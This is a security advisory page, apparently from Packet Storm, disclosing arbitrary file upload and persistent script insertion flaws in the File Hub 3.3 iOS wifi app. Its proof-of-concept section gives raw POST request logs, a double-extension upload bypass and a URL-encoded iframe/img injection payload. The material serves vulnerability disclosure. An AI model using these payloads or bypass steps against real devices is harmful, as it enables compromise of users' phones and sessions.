exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

File Hub 3.3 Arbitrary File Upload / Script Insertion

File Hub 3.3 Arbitrary File Upload / Script Insertion
Posted Feb 1, 2016
Authored by Benjamin Kunz Mejri, Vulnerability Laboratory | Site vulnerability-lab.com

File Hub version 3.3 suffers from script insertion and remote file upload vulnerabilities.

tags | exploit, remote, vulnerability, file upload
SHA-256 | 6cdf2dbd77cc83b85e74de212323af2473e5f46b996da2e83a4a0ff4779175c9

File Hub 3.3 Arbitrary File Upload / Script Insertion

Change Mirror Download
Document Title:
===============
File Hub v3.3 iOS (Wifi) - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1695


Release Date:
=============
2016-02-01


Vulnerability Laboratory ID (VL-ID):
====================================
1695


Common Vulnerability Scoring System:
====================================
7.2


Product & Service Introduction:
===============================
File Hub helps you accessing files on your iOS Device, Cloud Service and Remote Computer. It is powerful and intuitive, View, Play many file formats,
easily transfer files between computer or iOS devices and manage files via browser on computer.

(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/file-hub-powerful-intuitive/id520299954 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple vulnerabilities in the official File Hub mobile iOS wifi web-application.


Vulnerability Disclosure Timeline:
==================================
2016-02-01: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Gu Jing (iMore Apps)
Product: File Hub - Mobile Web Application 3.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
An arbitrary file upload web vulnerability has been discovered in the official File Hub mobile iOS wifi web-application.
The arbitrary file upload web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `File Upload` module. Remote attackers are able to inject own files with malicious `filename`
values in the `upload.php` file POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir
listing and sub folders of the wifi interface. The attacker is able to inject the lfi payload by usage of the wifi interface or the local file sync function.
The attacker can also attach multiple file extensions to bypass the web-server file validation to execute a malicious web-shell finally. Remote attackers can
exchange the filename with a double or tripple extension via POST method to bypass the upload validation and filter process. After the upload the attacker access
the file with one extension and exchange it with the other one to execute for example own php codes.

Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious attack requests.
The attack vector is located on the application-side of the wifi service and the request method to inject is POST.

The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the arbitrary file upload vulnerability results in mobile application compromise or connected device component compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] File Upload

Vulnerable File(s):
[+] upload.php

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] File Dir Index Listing


1.2
A persistent input validation web vulnerability has been discovered in the official File Hub mobile iOS wifi web-application.
The vulnerability allows remote attacker to inject malicious persistent script codes to the application-side of the mobile application.

The vulnerability is located in the name value of the filename or rename function. Remote attackers are able to edit files by renaming them.
Thus function can be used to inject own malicious script codes to the application-side of the index file dir listing interface application.
The request method to inject is POST and the attack vector of the issue is located on the application-side of the wifi interface mobile app.
The injection point is the rename name input field and the execution point is the file dir index that displays finally the uploaded or edited
web context.

The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the application-side web vulnerability requires no privilege web-application user account and only low or medium user interaction.
Successful exploitation of the vulnerabilities results in persistent phishing, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] File Rename

Vulnerable File(s):
[+] rename.php

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] File Dir Index Listing


Proof of Concept (PoC):
=======================
1.1
The arbitrary file upload web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: URL
http://localhost:8080/x[ARBITRARY FILE UPLOAD VULNERABILITY!]


PoC: Source
<tr style="" data-record-key="/"><"<img src="x">%20%20>"<./[ARBITRARY UPLOADED FILE - EXECUTION!]>" class="jtable-data-row">
<td class="jtable-selecting-column"><input type="checkbox"></td><td><img src="/webroot/images/fileicons/folder.png" height="32px" width="32px"></td>
<td><a style="cursor: pointer;" href=".">"><"<./[ARBITRARY UPLOADED FILE - EXECUTION!]></a></iframe></a></td><td>N/A</td><td>25.01.16, 21:35</td><td></td>


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/upload.php Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[16] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
Cache-Control[no-cache]
Referer[http://localhost:8080/]
Content-Length[1172]
Content-Type[multipart/form-data; boundary=---------------------------21961273099611]
Cookie[jtable%2376270709page-size=100]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------21961273099611
Content-Disposition: form-data; name="uploader"
fineuploader
-----------------------------21961273099611
Content-Disposition: form-data; name="dirpath"
/
-----------------------------21961273099611
Content-Disposition: form-data; name="qquuid"
3c9f405a-3686-473a-bc5d-68558901ac7e
-----------------------------21961273099611
Content-Disposition: form-data; name="qqtotalfilesize"
538
-----------------------------21961273099611
Content-Disposition: form-data; name="qqfile"; filename="./[ARBITRARY FILE UPLOAD VULNERABILITY!]2.png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/x[ARBITRARY FILE UPLOAD VULNERABILITY!] Load Flags[LOAD_NORMAL] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:8080/]
Cookie[jtable%2376270709page-size=100]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Fri, 29 Jan 2016 13:23:38 GMT]

Reference(s):
http://localhost:8080/upload.php




1.2
The persistent input validation web vulnerability can be exploited by remote attackers without privileged web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: URL
http://localhost:8080/x[ARBITRARY FILE UPLOAD VULNERABILITY!]


PoC: Source
<td class="jtable-command-column"><button class="jtable-command-button jtable-edit-command-button" title="Rename file"><span>Rename file
</span></button></td><td class="jtable-command-column"><button class="jtable-command-button jtable-delete-command-button" title="Delete"><span>Delete</span></button></td></tr>
... or via delete after the adding procedure is done ...
<span class="jtable-delete-confirm-message">Are you sure to delete file ""><"<[PERSISTENT INEJCTED SCRIPT CODE!]></span>


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/rename.php Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[232] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Content-Length[113]
Cookie[jtable%2376270709page-size=100]
Connection[keep-alive]
POST-Daten:
FileId[%2FZuhce]
Name[%22%3E%3C%22%3Cimg%20src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe%20src%3Da%3E%2520%3Ciframe%3E]
Response Header:
Accept-Ranges[bytes]
Content-Length[232]
Date[Fri, 29 Jan 2016 13:23:37 GMT]
-
Status: 200[OK]
GET http://localhost:8080/x[ARBITRARY FILE UPLOAD VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:8080/]
Cookie[jtable%2376270709page-size=100]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Fri, 29 Jan 2016 13:23:39 GMT]

Reference(s):
http://localhost:8080/rename.php


Security Risk:
==============
1.1
The security risk of the arbitrary file upload web vulnerability in the wifi interface application is estimated as high. (CVSS 7.4)

1.2
The security risk of the persistent web vulnerability in the wifi interface application rename function is estimated as medium. (CVSS 3.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™



--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close